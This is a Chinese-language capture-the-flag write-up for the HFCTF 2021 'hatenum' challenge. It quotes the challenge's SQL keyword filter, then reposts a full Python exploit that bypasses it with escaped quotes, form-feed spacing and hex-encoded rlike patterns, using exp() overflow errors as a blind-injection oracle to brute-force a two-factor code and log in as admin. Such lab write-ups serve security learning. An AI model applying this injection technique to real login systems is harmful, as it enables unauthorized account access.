[HFCTF 2021 Final]hatenum
解题步骤
function sql_waf($str){
if(preg_match('/union|select|or|and|\'|"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|<| |\*|,|;|\r|\n|\t|substr|right|left|mid/i', $str)){
die('Hack detected');
}
}
function num_waf($str){
if(preg_match('/\d{9}|0x[0-9a-f]{9}/i',$str)){
die('Huge num detected');
}
}
限制非常多,还限制了数字长度。可以进行万能密码登录,但是需要两步认证。
贴一个大佬exp:
import requests as r
import string
url = "http://d8e4fa3b-e3f4-4479-9724-2fead42e5a70.node4.buuoj.cn:81/"
pt = string.ascii_letters+string.digits+"$"
#/union|select|or|and|\'|"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|<| |\*|,|;|\r|\n|\t|substr|right|left|mid/i
#select * from users where username='$username' and password='$password'
def str2hex(raw):
ret = '0x'
for i in raw:
ret += hex(ord(i))[2:].rjust(2,'0')
return ret
ans = ""
tmp = "^"
for i in range(24):
for ch in pt:
#payload = f"||1 && username rlike 0x61646d && exp(710-(23-length(code)))#".replace(' ',chr(0x0c))
payload = f"||1 && username rlike 0x61646d && exp(710-(code rlike binary {str2hex(tmp+ch)}))#"
#print(payload)
payload = payload.replace(' ',chr(0x0c))
data = {
"username":"eki\\",
"password":payload,
"code":"1"
}
req = r.post(url+"/login.php",data=data,allow_redirects=False)
if 'fail' in req.text:
ans += ch
print(tmp+ch,ans)
if len(tmp) == 3:
tmp = tmp[1:]+ch
else:
tmp += ch
break
'''
^e e
^er er
^erg erg
ergh ergh
rghr erghr
ghru erghru
hrui erghrui
ruig erghruig
uigh erghruigh
igh2 erghruigh2
gh2u erghruigh2u
h2uy erghruigh2uy
2uyg erghruigh2uyg
uygh erghruigh2uygh
ygh2 erghruigh2uygh2
gh2u erghruigh2uygh2u
h2uy erghruigh2uygh2uy
2uyg erghruigh2uygh2uyg
uygh erghruigh2uygh2uygh
'''
rev_ans = ""
tmp = "$"
for i in range(24):
for ch in pt:
#payload = f"||1 && username rlike 0x61646d && exp(710-(23-length(code)))#".replace(' ',chr(0x0c))
payload = f"||1 && username rlike 0x61646d && exp(710-(code rlike binary {str2hex(ch+tmp)}))#"
#print(payload)
payload = payload.replace(' ',chr(0x0c))
data = {
"username":"eki\\",
"password":payload,
"code":"1"
}
req = r.post(url+"/login.php",data=data,allow_redirects=False)
if 'fail' in req.text:
rev_ans = ch+rev_ans
print(ch+tmp,rev_ans)
if len(tmp) == 3:
tmp = ch+tmp[:-1]
else:
tmp = ch+tmp
break
'''
g$ g
ig$ ig
2ig$ 2ig
32ig 32ig
u32i u32ig
iu32 iu32ig
uiu3 uiu32ig
3uiu 3uiu32ig
23ui 23uiu32ig
h23u h23uiu32ig
gh23 gh23uiu32ig
igh2 igh23uiu32ig
uigh uigh23uiu32ig
ruig ruigh23uiu32ig
hrui hruigh23uiu32ig
ghru ghruigh23uiu32ig
rghr rghruigh23uiu32ig
ergh erghruigh23uiu32ig
'''
data = {
"username":"admin\\",
"password":"||1#",
"code":"erghruigh2uygh23uiu32ig"
}
req = r.post(url+"/login.php",data=data)
print(req.text)
用到了exp的报错从而进行布尔盲注。这里exp溢出导致error,从而导致盲注。
由于限制了数字长度,所以只能3个3个的爆破。rlike
和regexp
的功能类似,所以可以进行局部匹配。
在从头到尾爆破的时候,由于gh2
重复了两次,所以就会匹配到u
,然后就一直重复。
这时就需要倒序也来一波爆破,才能爆破出正确结果。
更多相关知识:https://blog.z3ratu1.cn/%5BHFCTF2021%5Dhatenum.htmlhttp://